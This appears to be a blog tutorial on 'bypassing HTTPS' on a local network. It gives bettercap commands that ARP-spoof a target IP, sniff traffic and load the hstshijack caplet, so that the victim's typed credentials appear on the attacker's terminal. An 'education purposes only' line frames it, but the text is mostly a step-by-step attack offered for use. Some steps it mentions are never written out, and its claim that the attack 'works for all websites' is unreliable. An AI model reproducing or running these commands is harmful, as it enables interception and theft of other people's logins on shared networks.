Updated: Jul 6
In this article, I’m going to teach you how to bypass HTTPS websites. before that, we should know HTTP and HTTPS. Now we clarify that HTTPS websites are more secure form HTTP websites but we can easily bypass
How to Bypass HTTPS websites?
THIS TUTORIAL IS ONLY FOR EDUCATION PURPOSES ONLY AND PLEASE DO USE IT FOR EDUCATIONAL PURPOSES ONLY
THIS ATTACK WORKS FOR ALL WEBSITES
Downloading The Files
First, you need to download the hstshjack file to bypass HTTP websites.
Once you download then extract with the password of techtronics101.com
Now copy hstshjack folder to the bettercap caplets folder by using the following commands
cd Downloads engrampa -h hstshijack.zip rm -r /usr/share/bettercap/caplets/hstshijack cp -r hstshijack //usr/share/bettercap/caplets/
First, you will need to run bettercap tool on your terminal so type this below command.
sudo bettercap -iface wlan0
Now type the below command’s on your bettercap terminal one by one
net.probe on net.recon on set arp.spoof.fullduplex true set arp.spoof.targets 'your target ip' arp.spoof on set net.sniff.local true net.sniff on
Now we need to start HTTPS bypassing so now we need to set our caplets. For this type in the below command.
Now choose hstshijack caplet so for this type in the below command
That’s it!!. Now if your victim types in any credentials on any website that will show on your terminal.
The websites in this photo are: